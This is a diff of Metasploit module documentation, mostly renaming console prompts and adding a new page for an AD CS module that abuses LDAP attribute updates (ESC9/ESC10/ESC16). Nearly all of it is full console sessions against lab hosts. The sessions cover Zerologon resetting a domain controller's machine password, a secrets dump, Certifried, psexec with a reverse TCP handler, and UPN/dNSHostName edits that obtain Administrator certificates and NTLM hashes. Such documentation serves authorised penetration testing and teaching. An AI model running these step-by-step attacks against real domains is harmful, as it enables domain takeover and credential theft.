+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 

 Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):

@@ -75,7 +75,7 @@ Auxiliary action:
   REMOVE  Remove the machine account password


-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
 [*] Running module against 192.168.159.53

 [*] 192.168.159.53: - Connecting to the endpoint mapper service...
@@ -84,7 +84,7 @@ msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
 [+] 192.168.159.53:6403 - Successfully authenticated
 [+] 192.168.159.53:6403 - Successfully set the machine account (WIN-GD5KVDKUNIP$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
 ```

 At this point the `exploit/windows/smb/psexec` module can be used to achieve code execution if desired. Set the `SMBUser` option to the
@@ -94,14 +94,14 @@ Next, recover the original machine account password value using `auxiliary/gathe
 value in the `$MACHINE.ACC` section.

 ```
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > use auxiliary/gather/windows_secrets_dump 
-msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.53
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > use auxiliary/gather/windows_secrets_dump 
+msf auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.53
 RHOSTS => 192.168.159.53
-msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser WIN-GD5KVDKUNIP$
+msf auxiliary(gather/windows_secrets_dump) > set SMBUser WIN-GD5KVDKUNIP$
 SMBUser => WIN-GD5KVDKUNIP$
-msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
+msf auxiliary(gather/windows_secrets_dump) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
 SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
-msf6 auxiliary(gather/windows_secrets_dump) > run
+msf auxiliary(gather/windows_secrets_dump) > run
 [*] Running module against 192.168.159.53

 [*] 192.168.159.53:445 - Service RemoteRegistry is already running
@@ -131,18 +131,18 @@ EXCHG\WIN-GD5KVDKUNIP$:aad3b435b51404eeaad3b435b51404ee:ec3a7fa2158f1f705898d538
 No cached hashes on this system
 [*] 192.168.159.53:445 - Cleaning up...
 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/windows_secrets_dump) >
+msf auxiliary(gather/windows_secrets_dump) >
 ```

 Finally, restore the original value using this module.

 ```
-msf6 auxiliary(gather/windows_secrets_dump) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTORE 
+msf auxiliary(gather/windows_secrets_dump) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTORE 
 ACTION => RESTORE
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
 PASSWORD => 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 

 Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):

@@ -161,7 +161,7 @@ Auxiliary action:
   RESTORE  Restore the machine account password


-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
 [*] Running module against 192.168.159.53

 [*] 192.168.159.53: - Connecting to the endpoint mapper service...
@@ -169,5 +169,5 @@ msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
 [*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
 [+] 192.168.159.53:6403 - Successfully set machine account (WIN-GD5KVDKUNIP$) password
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
 ```
@@ -124,7 +124,7 @@ user set in the `IMPERSONATE` option (default is `Administrator`).

 ### Windows Server 2019 Domain Controller with ADCS installed
 ```msf
-msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run verbose=true rhosts=192.168.100.104 username=Test password=123456 domain=mylab.local dc_name=DC02 ca=mylab-DC02-CA
+msf auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run verbose=true rhosts=192.168.100.104 username=Test password=123456 domain=mylab.local dc_name=DC02 ca=mylab-DC02-CA
 [*] Running module against 192.168.100.104

 [*] 192.168.100.104:445 - Requesting the ms-DS-MachineAccountQuota value to see if we can add any computer accounts...
@@ -169,7 +169,7 @@ msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run verbose=true rhosts
 [!] 192.168.100.104:445 - Unable to delete the computer account, this will have to be done manually with an Administrator account (Could not delete the computer DESKTOP-E0SYYS6U$: Error returned while deleting user in SAM server: (0xc0000022) STATUS_ACCESS_DENIED: {Access Denied} A process has requested access to an object but has not been granted those access rights.)
 [*] 192.168.100.104:445 - Disconnecting SMB
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > creds
+msf auxiliary(admin/dcerpc/cve_2022_26923_certifried) > creds
 Credentials
 ===========

@@ -178,7 +178,7 @@ host             origin           service        public             private
 192.168.100.104  192.168.100.104  445/tcp (smb)  DESKTOP-E0SYYS6U$  4PuZlX57aULpEKXUZisjp227G0W0Rdvi                                   MYLAB        Password
 192.168.100.104  192.168.100.104  445/tcp (smb)  dc02$              aad3b435b51404eeaad3b435b51404ee:a93d16873c9d49be9b1bce4359dcaa6d  MYLAB.LOCAL  NTLM hash     nt,lm

-msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > loot
+msf auxiliary(admin/dcerpc/cve_2022_26923_certifried) > loot

 Loot
 ====
@@ -192,7 +192,7 @@ host             service  type                 name             content

 ### Using `psexec` with the TGS impersonating the Administrator
 ```msf
-msf6 exploit(windows/smb/psexec) > exploit rhosts=192.168.100.104 lhost=192.168.100.1 smbuser=administrator smbdomain=mylab.local Smb::Auth=kerberos Smb::Rhostname=dc02.mylab.local DomainControllerRhost=192.168.100.104
+msf exploit(windows/smb/psexec) > exploit rhosts=192.168.100.104 lhost=192.168.100.1 smbuser=administrator smbdomain=mylab.local Smb::Auth=kerberos Smb::Rhostname=dc02.mylab.local DomainControllerRhost=192.168.100.104


 [*] Started reverse TCP handler on 192.168.100.1:4444
@@ -0,0 +1,277 @@
+## Vulnerable Application
+This module requests certificates via MS-ICPR (Active Directory Certificate Services) after updating an LDAP object
+attribute, typically on behalf of another user. The certificate's usability depends on the configuration of the
+certificate template, enabling operations such as authentication. PFX certificate files generated by this module are
+encrypted with a blank password.
+
+To perform the LDAP attribute update, the module requires write privileges over the
+target user in the domain. For example, it can modify the userPrincipalName (UPN) or dNSHostName of the target user
+before requesting the certificate. This module leverages the generic auxiliary/admin/ldap/ldap_object_attribute module
+to handle LDAP attribute updates.
+
+
+This module is capable of exploiting ESC9, ESC10, and ESC16.
+
+### Setup
+Follow the instructions [[here|./ad-certificates/overview.md]] to set up an AD CS server that is vulnerable to the scenarios you want to exploit, with the appropriately configured template.
+For detailed information on each ESC attack workflow, refer to the [[AD CS Exploitation Scenarios|./ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md]] documentation.
+
+## Options
+
+### LDAPUsername
+The username to authenticate to the LDAP server, this must be a user with write access over the `TARGET_USERNAME`.
+
+### LDAPPassword
+The password for the `LDAPUsername` account.
+
+### LDAPDomain
+The domain of the `LDAPUsername`, e.g., `demo.local`.
+
+### CA
+The target certificate authority.
+
+### CERT_TEMPLATE
+The certificate template to issue, e.g., "User".
+
+### TARGET_USERNAME
+The username of the target account whose LDAP object will be updated and for whom the certificate will be requested.
+
+### TARGET_PASSWORD
+The password of the target username. Not required. The module will use Shadow Credentials to authenticate as the target user if this is left blank.
+
+### UPDATE_LDAP_OBJECT
+The LDAP attribute to update, such as `userPrincipalName` or `dNSHostName`.
+
+### UPDATE_LDAP_OBJECT_VALUE
+The new value to set for the specified LDAP attribute, set this to the user name you wish to impersonate, e.g., `Administrator` if you're updating the `userPrincipalName`.
+If you're updating the `dNSHostName`, set this to the desired DNS hostname, e.g., `host.domain.local` (it must be a valid FQDN in this case).
+
+### ALT_UPN
+An alternate UPN (User Principal Name) to set for the target user, e.g., `Administrator@domain.local`.
+
+### ALT_SID
+An alternate SID (Security Identifier) to set for the target user, e.g., `S-1-5-21-...`.
+
+### ALT_DNS
+An alternate DNS hostname to set for the target user, e.g., `host.domain.local`.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use esc_update_ldap_object`
+1. Set the `RHOST`, `LDAPUsername`, `LDAPPassword` and `LDAPDomain` options - note these credentials need to have write access over the `TARGET_USERNAME`
+1. Set `TARGET_USERNAME` to the user you want to update and then request a certificate for
+1. Set the `UPDATE_LDAP_OBJECT` to either `userPrincipalName` or `dNSHostName` depending on the scenario you are exploiting
+1. Set the `UPDATE_LDAP_OBJECT_VALUE` to the value you want to set for the `UPDATE_LDAP_OBJECT`, e.g., `Administrator`
+1. Set `CA` to the name of the CA you want to request a certificate and `cert_template` to the name of the certificate template you want to use
+1. Run the module
+1. This should update the LDAP object attribute and request a certificate for the target user, which will be saved as a .pfx file.
+1. If the target is vulnerable to the scenario you are exploiting, the pfx file will allow for privilege escalation.
+
+## Scenarios
+
+### ESC9 - Update userPrincipalName to Administrator
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set cert_template ESC9-Template
+cert_template => SpencerTest
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ca kerberos-DC2-CA
+ca => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE Administrator
+UPDATE_LDAP_OBJECT_VALUE => Administrator
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_windows.ad.cs_563081.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 2ff08c15-0ab3-98ad-ee0b-3fd1fbcf3e9d
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_263627.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_015140.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717140907_default_172.16.199.200_windows.ad.cs_548728.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] No matching entries found - check device ID
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: Administrator
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+### ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used
+```
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options
+
+Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):
+
+   Name                      Current Setting    Required  Description
+   ----                      ---------------    --------  -----------
+   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
+   ALT_DNS                                      no        Alternative certificate DNS
+   ALT_SID                                      no        Alternative object SID
+   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA                        kerberos-DC2-CA    yes       The target certificate authority
+   CERT_TEMPLATE             User               yes       The certificate template
+   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
+   LDAPPassword              N0tpassword!       yes       The password to authenticate with
+   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
+   SSL                       false              no        Enable SSL on the LDAP connection
+   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
+   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
+   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
+   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   445              no        The target port (TCP)
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName:
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
+```
+
+### ESC9 - Update dnsHostName to `dc2.kerberos.issue`
+```
+ msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username "Test2$"
+target_username => Test2$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE dc2.kerberos.issue
+UPDATE_LDAP_OBJECT_VALUE => dc2.kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT dnsHostName
+UPDATE_LDAP_OBJECT => dNSHostName
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CA kerberos-DC2-CA
+CA => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CERT_TEMPLATE ESC9-Template-Dns
+CERT_TEMPLATE => ESC9-Template-Dns
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername Test1$
+ldapusername => Test1$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of Test2$'s dNSHostName:
+[*] Attempting to update dNSHostName for CN=Test2,CN=Computers,DC=kerberos,DC=issue to dc2.kerberos.issue...
+[+] Successfully updated CN=Test2,CN=Computers,DC=kerberos,DC=issue's dNSHostName to dc2.kerberos.issue
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for Test2$
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250730093954_default_172.16.199.200_windows.ad.cs_384135.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 44760c6e-8637-598a-ad8e-04aa4b99ee58
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for Test2$
+[!] Warning: Provided principal and realm (Test2$@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250730093954_default_172.16.199.200_mit.kerberos.cca_631833.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Test2$@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250730093954_default_172.16.199.200_mit.kerberos.cca_923562.bin
+[+] Found NTLM hash for Test2$: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate DNS: dc2.kerberos.issue
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250730093956_default_172.16.199.200_windows.ad.cs_337994.pfx
+[*] 172.16.199.200:445 - Removing shadow credential
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 44760c6e-8637-598a-ad8e-04aa4b99ee58
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+For more exploit scenarios that this module can exploit, refer to the [[Attacking-AD-CS-ESC-Vulnerabilities|./ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md]] documentation.
@@ -61,6 +61,12 @@ Username to request on behalf of. This is in the format `$domain\\$username`.

 The digest algorithm to use for cryptographic signing operations.

+When set to `true`, the module will use strong URL to SID mapping when requesting a certificate that contains a URL SAN.
+This is done by adding the `tag:microsoft.com,2022-09-14:sid:` part to the SAN which is formatted like so:
+`URL=tag:microsoft.com,2022-09-14:sid:<value>`. This option was introduced to maintain compatibility with older windows
+versions as this is not compatible with versions prior to Windows Server Preview Build 25246.
+[More info](https://techcommunity.microsoft.com/blog/askds/preview-of-san-uri-for-certificate-strong-mapping-for-kb5014754/3789785)
+
 ## Actions

 ### REQUEST_CERT
@@ -73,14 +79,14 @@ For this module to work, it's necessary to know the name of a CA and certificate
 by a normal user via LDAP.

 ```msf
-msf6 > use auxiliary/gather/ldap_query
-msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
+msf > use auxiliary/gather/ldap_query
+msf auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
 BIND_DN => aliddle@msflab.local
-msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
+msf auxiliary(gather/ldap_query) > set BIND_PW Password1!
 BIND_PW => Password1!
-msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_AD_CS_CAS
+msf auxiliary(gather/ldap_query) > set ACTION ENUM_AD_CS_CAS
 ACTION => ENUM_AD_CS_CAS
-msf6 auxiliary(gather/ldap_query) > run
+msf auxiliary(gather/ldap_query) > run
 [*] Running module against 192.168.159.10

 [+] Successfully bound to the LDAP server!
@@ -99,7 +105,7 @@ CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Con
 name                  msflab-DC-CA

 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_query) >
+msf auxiliary(gather/ldap_query) >
 ```

 ### Issue A Generic Certificate
@@ -107,18 +113,18 @@ In this scenario, an authenticated user issues a certificate for themselves usin
 by default. The user must know the CA name, which in this case is `msflab-DC-CA`.

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+msf > use auxiliary/admin/dcerpc/icpr_cert
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
 SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
 CA => msflab-DC-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
 CERT_TEMPLATE => User
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
@@ -130,7 +136,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 ### Issue A Certificate With A Specific subjectAltName (AKA ESC1)
@@ -154,24 +160,24 @@ See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910
 information.

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+msf > use auxiliary/admin/dcerpc/icpr_cert
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
 SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
 CA => msflab-DC-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
 CERT_TEMPLATE => ESC1-Test
